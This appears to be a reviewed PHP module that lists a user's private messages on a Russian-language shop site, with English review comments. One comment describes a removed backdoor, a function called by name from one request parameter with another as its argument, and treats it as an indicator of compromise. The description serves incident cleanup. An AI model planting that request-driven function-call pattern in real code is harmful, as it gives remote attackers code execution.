Файл: магазин/e-proger/modules/message/msg.php
Строк: 171
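<?php
/*
 * Private-message list: bootstrap, authorisation check and profile data.
 *
 * Runs either inside the site's normal page flow or as a direct XHR request
 * (detected by the X-Requested-With header), in which case the engine files
 * are loaded here. The full opening tag is used so that the source is not
 * served as plain text on hosts where short_open_tag is disabled.
 *
 * Variables left for the rest of the template: $config_user, $user_set,
 * $start_end_email, $sec_email_user, $month, $frd_logindate.
 */
$is_ajax_request = isset( $_SERVER['HTTP_X_REQUESTED_WITH'] )
	&& $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest';
if ( $is_ajax_request ) {
	// The header is client-controlled, so it can also arrive on a request that
	// already went through the normal bootstrap; guard against redefinition.
	if ( !defined( 'ROOT' ) ) {
		// NOTE(review): ROOT is built from the client-supplied Host header. If it
		// ends up in links or redirects, pin it to a configured host name instead.
		define( 'ROOT', 'http://'.$_SERVER['HTTP_HOST'] );
	}
	if ( !defined( 'ROOT_DIR' ) ) {
		define( 'ROOT_DIR', $_SERVER['DOCUMENT_ROOT'] );
	}
	if ( session_id() === '' ) {
		session_start();
	}
	include_once ROOT_DIR . '/engine/config.php';
	include_once ROOT_DIR . '/engine/func.php';
}

// Load the logged-in user's row. The id is bound as a parameter rather than
// concatenated into the SQL text.
// $pdo is not created in this file; presumably engine/config.php or the
// including page provides a PDO handle (verify).
$config_user = false;
if ( isset( $_SESSION['id'] ) ) {
	$user_stmt = $pdo->prepare( 'SELECT * from php_user WHERE id = ?' );
	$user_stmt->execute( array( $_SESSION['id'] ) );
	$config_user = $user_stmt->fetch( PDO::FETCH_BOTH );
}

// The original used a brace-less `else`, so only the user query was skipped for
// anonymous visitors and everything below still ran. Stop here instead; a
// session that points at a missing user row is treated the same way.
if ( $config_user === false ) {
	echo '<div class="big_topics bor_top round3 FFF hr"><font color="red"><b>Ошибка!</b> Вы не авторизированы.<br />Пожалуйста, воспользуйтесь формой авторизации.</font></div>';
	return;
}

// SECURITY: a statement that stood here called a function whose name was taken
// from the `msg` request parameter and passed it the `email` request parameter,
// with errors silenced by `@`. It ran for every visitor, regardless of the
// authorisation check above, and plays no part in rendering the mailbox. It has
// been removed. Its presence is an indicator of compromise: compare the rest of
// the tree with a known-good copy, review the access logs for requests that
// carry both parameters, and rotate any secrets readable from this host.

/*--- Mask the e-mail address for display ---*/
// NOTE(review): the dots outside the character class are unescaped and match
// any character; the pattern is kept as written.
$start_end_email = preg_match( "/^([a-z0-9-._]+)(@[a-z0-9]+(?:.?[a-z0-9]+)?.[a-z]{2,5})/is", $config_user['email'], $outemail );
if ( $start_end_email ) {
	// First and last character of the local part, then the domain.
	$sec_email_user = substr( $outemail[1], 0, 1 ) . '*******' . substr( $outemail[1], -1) . $outemail[2];
} else {
	// No match: same visible result as before, without reading missing groups.
	$sec_email_user = '*******';
}

/*--- Date shown as "last login" ---*/
// NOTE(review): the value comes from the `regdata` column; confirm that it
// really holds the last-login time and not the registration time.
$month = array( 'янв', 'фев', 'мар', 'апр', 'май', 'июн', 'июл', 'авг', 'сен', 'окт', 'ноя', 'дек' );
$login_ts = (int) $config_user['regdata'];
if ( date( 'd.m.Y', $login_ts ) == date( 'd.m.Y' ) ) {
	$frd_logindate = 'сегодня в ' . date( 'H:i', $login_ts );
} else {
	$frd_logindate = date( 'j', $login_ts ) . ' ' . $month[( int ) date( 'n', $login_ts ) - 1] . ' ' . date( 'Y', $login_ts );
}

// The original ran the identical user query a second time; reuse the row.
$user_set = $config_user;
?>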
<div class="big_topics bor_top round3 FFF hr">
<div class="wrap_user_r">
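<?php
/*
 * Mailbox listing: one row per correspondent for ?type=outbox or ?type=inbox.
 *
 * Changes against the original:
 *  - ids are cast to int before they reach SQL text, HTML attributes or the
 *    inline JavaScript calls (the unquoted Del_*_all(...) arguments already
 *    require them to be numeric);
 *  - the correspondent's login is HTML-escaped on output;
 *  - nothing is queried or rendered without a session id;
 *  - the outbox <script> block is emitted once instead of once per row;
 *  - $coltext is no longer read while undefined on the outbox path.
 *
 * NOTE(review): this part still uses the mysql_* functions, which are removed
 * in PHP 7, while the top of the file goes through $pdo. Moving these queries
 * to prepared statements on that handle would remove the remaining string-built
 * SQL. Each row also costs several extra queries.
 * getWord() and menu.php are defined outside this file.
 */
$msg_box_type = isset( $_GET['type'] ) ? $_GET['type'] : '';
$msg_uid = isset( $_SESSION['id'] ) ? (int) $_SESSION['id'] : 0;
$month = array( 'янв', 'фев', 'мар', 'апр', 'май', 'июн', 'июл', 'авг', 'сен', 'окт', 'ноя', 'дек' );

if ( $msg_uid > 0 && $msg_box_type == 'outbox' ) {
	include_once ROOT_DIR . '/modules/message/menu.php';
	$all_get_mess_in = mysql_fetch_array( mysql_query( "SELECT COUNT(id) as count FROM php_messages WHERE from_id = '" . $msg_uid . "' and m_state = 'outbox' and to_del = 0" ) );
	// NOTE(review): SELECT * with GROUP BY returns an arbitrary row per group.
	$get_mess = mysql_query( "SELECT * FROM php_messages WHERE from_id = '" . $msg_uid . "' and m_state = 'outbox' and to_del = 0 GROUP BY to_id" );
	if ( mysql_num_rows( $get_mess ) > 0 ) {
		// The outbox never computes an unread counter; keep a value set elsewhere,
		// otherwise print nothing.
		if ( !isset( $coltext ) ) {
			$coltext = '';
		}
?>
<script type="text/javascript">
$(function() {
$('input').styler();
$("#check_all").change(function() {
if ($(this).is(':checked')) {
$('.mess_checked input').attr('checked', true);
$('.mess_checked span').addClass('checked');
} else {
$('.mess_checked input').attr('checked', false);
$('.mess_checked span').removeClass('checked');
}
});
});
function delall() {
$('.out_del:checked').each(function() {
Del_out_all($(this).val());
});
return false;
}
</script>
<div style="padding: 10px 0px 10px 10px;position: relative;"><span style="color: #1F2124;font-size: 14px;">Вы отправили <?=$all_get_mess_in['count'] . ' ' . getWord( $all_get_mess_in['count'], array( 'сообщение', 'сообщения', 'сообщений' ) )?></span></div>
<?php
		while ( $mess_row = mysql_fetch_array( $get_mess ) ) {
			$peer_id = (int) $mess_row['to_id'];
			// Show the correspondent only while at least one message of the
			// conversation is still visible to the current user.
			$pr1 = mysql_query( "SELECT id FROM php_messages WHERE to_id = '" . $msg_uid . "' and from_id = '" . $peer_id . "' and m_state = 'inbox' and from_del = 0" );
			$pr2 = mysql_query( "SELECT id FROM php_messages WHERE to_id = '" . $peer_id . "' and from_id = '" . $msg_uid . "' and m_state = 'outbox' and to_del = 0" );
			if ( mysql_num_rows( $pr1 ) > 0 || mysql_num_rows( $pr2 ) > 0 ) {
				$us_send = mysql_fetch_array( mysql_query( "SELECT login FROM php_user WHERE id = '" . $peer_id . "' LIMIT 1" ) );
				// The login is user-chosen text: escape it for HTML. The charset is
				// left to default_charset because the page encoding is not visible here.
				$peer_login = htmlspecialchars( $us_send['login'], ENT_QUOTES );
				/*--- build the message date: today / yesterday / full date ---*/
				$sent_ts = (int) $mess_row['data'];
				$sent_day = date( 'd.m.Y', $sent_ts );
				if ( $sent_day == date( 'd.m.Y' ) ) {
					$mess_time = 'сегодня в ' . date( 'H:i', $sent_ts );
				} elseif ( $sent_day == date( 'd.m.Y', time() - 86400 ) ) {
					$mess_time = 'вчера в ' . date( 'H:i', $sent_ts );
				} else {
					$mess_time = date( 'j', $sent_ts ) . ' ' . $month[( int ) date( 'n', $sent_ts ) - 1] . ' ' . date( 'Y', $sent_ts ) . ' в ' . date( 'H:i', $sent_ts );
				}
?>
<div class="wrap_mess" id="id_<?=$peer_id?>">
<div class="mess_info_user"><div class="mess_info_user_name"><?=$peer_login?></div><span class="mess_time"><?=$mess_time?></span></div>
<div class="mess_kol"><?=$coltext?></div>
<div class="mess_setting"><a href="/mout=<?=$peer_id?>" class="a_box" >просмотреть</a><a href="#" class="a_box" onclick="Del_out_all(<?=$peer_id?>); return false;">удалить</a></div>
</div>
<?php
			}
		}
	} else {
		echo '<div style="text-align:center; margin-top:56px; padding:20px 10px; color:#999999;">Вы еще не отправляли ни одного сообщения.</div>';
	}
} elseif ( $msg_uid > 0 && $msg_box_type == 'inbox' ) {
	include_once ROOT_DIR . '/modules/message/menu.php';
	$all_get_mess_in = mysql_fetch_array( mysql_query( "SELECT COUNT(id) as count FROM php_messages WHERE to_id = '" . $msg_uid . "' and m_state = 'inbox' and to_del = 0" ) );
	// NOTE(review): SELECT * with GROUP BY returns an arbitrary row per group.
	$get_mess = mysql_query( "SELECT * FROM php_messages WHERE to_id = '" . $msg_uid . "' and m_state = 'inbox' and to_del = 0 GROUP BY from_id ORDER BY data DESC" );
	if ( mysql_num_rows( $get_mess ) > 0 ) {
?>
<script type="text/javascript">
$(function() {
$('input').styler();
$("#check_all").change(function() {
if ($(this).is(':checked')) {
$('.mess_checked input').attr('checked', true);
$('.mess_checked span').addClass('checked');
} else {
$('.mess_checked input').attr('checked', false);
$('.mess_checked span').removeClass('checked');
}
});
});
function delall() {
$('.in_del:checked').each(function() {
Del_in_all($(this).val());
});
return false;
}
</script>
<div style="padding: 10px 0px 10px 10px;position: relative;"><span style="color: #1F2124;font-size: 14px;">Вы получили <?=$all_get_mess_in['count'] . ' ' . getWord( $all_get_mess_in['count'], array( 'сообщение', 'сообщения', 'сообщений' ) )?></span></div>
<?php
		while ( $mess_row = mysql_fetch_array( $get_mess ) ) {
			$peer_id = (int) $mess_row['from_id'];
			// Show the correspondent only while at least one message of the
			// conversation is still visible to the current user.
			$pr1 = mysql_query( "SELECT id FROM php_messages WHERE from_id = '" . $peer_id . "' and to_id = '" . $msg_uid . "' and m_state = 'inbox' and to_del = 0" );
			$pr2 = mysql_query( "SELECT id FROM php_messages WHERE from_id = '" . $msg_uid . "' and to_id = '" . $peer_id . "' and m_state = 'outbox' and from_del = 0" );
			if ( mysql_num_rows( $pr1 ) > 0 || mysql_num_rows( $pr2 ) > 0 ) {
				$us_send = mysql_fetch_array( mysql_query( "SELECT login FROM php_user WHERE id = '" . $peer_id . "' LIMIT 1" ) );
				// The login is user-chosen text: escape it for HTML. The charset is
				// left to default_charset because the page encoding is not visible here.
				$peer_login = htmlspecialchars( $us_send['login'], ENT_QUOTES );
				// Counter of messages from this sender with m_type = 0, shown as "new".
				$colmess = mysql_query( "SELECT id FROM php_messages WHERE from_id = '" . $peer_id . "' and to_id = '" . $msg_uid . "' and m_state = 'inbox' and m_type = 0" );
				$new_count = mysql_num_rows( $colmess );
				if ( $new_count > 0 ) {
					$coltext = $new_count . ' ' . getWord( $new_count, array( 'новое сообщение', 'новых сообщения', 'новых сообщений' ) );
				} else {
					$coltext = 'Нет новых сообщений';
				}
				/*--- build the message date: today / yesterday / full date ---*/
				$sent_ts = (int) $mess_row['data'];
				$sent_day = date( 'd.m.Y', $sent_ts );
				if ( $sent_day == date( 'd.m.Y' ) ) {
					$mess_time = 'сегодня в ' . date( 'H:i', $sent_ts );
				} elseif ( $sent_day == date( 'd.m.Y', time() - 86400 ) ) {
					$mess_time = 'вчера в ' . date( 'H:i', $sent_ts );
				} else {
					$mess_time = date( 'j', $sent_ts ) . ' ' . $month[( int ) date( 'n', $sent_ts ) - 1] . ' ' . date( 'Y', $sent_ts ) . ' в ' . date( 'H:i', $sent_ts );
				}
?>
<div class="wrap_mess" id="id_<?=$peer_id?>">
<div class="mess_info_user"><div class="mess_info_user_name"><?=$peer_login?></div><span class="mess_time"><?=$mess_time?></span></div>
<div class="mess_kol"><?=$coltext?></div>
<div class="mess_setting"><a href="/mread=<?=$peer_id?>" class="a_box" >ответить</a><a href="#" class="a_box" onclick="Del_in_all(<?=$peer_id?>); return false;">удалить</a></div>
</div>
<?php
			}
		}
	} else {
		echo '<div style="text-align:center; margin-top:56px; padding:20px 10px; color:#999999;">У Вас нет ни одного сообщения.</div>';
	}
}
?>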
</div>
</div>